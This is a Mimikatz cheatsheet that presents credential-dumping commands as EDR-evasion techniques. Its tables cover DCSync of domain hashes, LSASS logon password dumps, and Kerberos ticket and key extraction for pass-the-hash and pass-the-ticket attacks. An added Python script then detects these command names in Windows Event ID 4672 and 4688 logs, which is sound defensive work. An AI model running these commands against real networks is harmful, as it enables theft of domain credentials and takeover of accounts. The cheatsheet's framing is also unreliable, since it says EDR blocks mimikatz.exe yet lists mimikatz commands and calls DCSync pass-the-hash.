Mimikatz Cheatsheet

Because modern EDR kills mimikatz.exe, use these techniques:

| Command | Result |
| :--- | :--- |
| lsadump::dcsync /user:Administrator | Gets the hash of a specific user without touching LSASS. |
| lsadump::dcsync /all | Dumps domain user hashes. This is catastrophic for the blue team. |

This is the classic "pass-the-hash" or "pass-the-password" attack.

Security teams monitor for the privilege::debug command and the loading of unusual drivers, which are often logged in Event ID 4672 or 4688.

| Command | Result |
| :--- | :--- |
| sekurlsa::logonpasswords | Dumps all active logon sessions (NTLM hashes + plaintext if WDigest is enabled). |
| sekurlsa::tickets | Dumps all Kerberos tickets for pass-the-ticket attacks. |
| sekurlsa::ekeys | Dumps Kerberos encryption keys (useful for Overpass-the-Hash). |
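For the monitoring note above (Event ID 4672 and 4688), a triage sketch over exported Security-log events; this is an added example, not code from the original page. The sample events, the `triage` function and the `EXPECTED_DEBUG_USERS` allowlist are constructed assumptions, and command-line auditing is assumed to be enabled so that 4688 carries `CommandLine`.

```python
import re

# Module::command strings listed on this page, matched case-insensitively
# anywhere in a 4688 command line, whatever the binary has been renamed to.
CMD_RE = re.compile(
    r"\b(privilege::debug|sekurlsa::(?:logonpasswords|tickets|ekeys)|lsadump::dcsync)\b",
    re.IGNORECASE,
)
# Assumption: accounts expected to hold SeDebugPrivilege in this environment.
EXPECTED_DEBUG_USERS = {"SYSTEM", "svc_backup"}

# Constructed sample events (not real logs), using Security-log field names.
SAMPLE_EVENTS = [
    {"EventID": 4672, "SubjectUserName": "SYSTEM",
     "PrivilegeList": "SeDebugPrivilege SeTcbPrivilege"},
    {"EventID": 4672, "SubjectUserName": "jdoe",
     "PrivilegeList": "SeDebugPrivilege SeBackupPrivilege"},
    {"EventID": 4688, "SubjectUserName": "jdoe",
     "NewProcessName": "C:\\Temp\\notepad2.exe",
     "CommandLine": "notepad2.exe Privilege::Debug sekurlsa::logonpasswords"},
    {"EventID": 4688, "SubjectUserName": "asmith",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
]


def triage(events):
    """Return (severity, user, reason) findings for 4672/4688 events."""
    findings = []
    debug_users = set()  # unexpected users seen receiving SeDebugPrivilege
    for ev in events:
        user = ev.get("SubjectUserName", "?")
        if ev["EventID"] == 4672 and "SeDebugPrivilege" in ev.get("PrivilegeList", ""):
            if user not in EXPECTED_DEBUG_USERS:
                debug_users.add(user)
                findings.append(("medium", user, "SeDebugPrivilege assigned at logon"))
        elif ev["EventID"] == 4688:
            hits = sorted({m.lower() for m in CMD_RE.findall(ev.get("CommandLine", ""))})
            if hits:
                # Escalate when the same user also received SeDebugPrivilege earlier.
                sev = "high" if user in debug_users else "medium"
                findings.append((sev, user, "command line contains " + ", ".join(hits)))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Event 4672 fires on every privileged logon, so the allowlist and the correlation with 4688 are what keep this usable; string matching alone misses tools that rename or strip these command names.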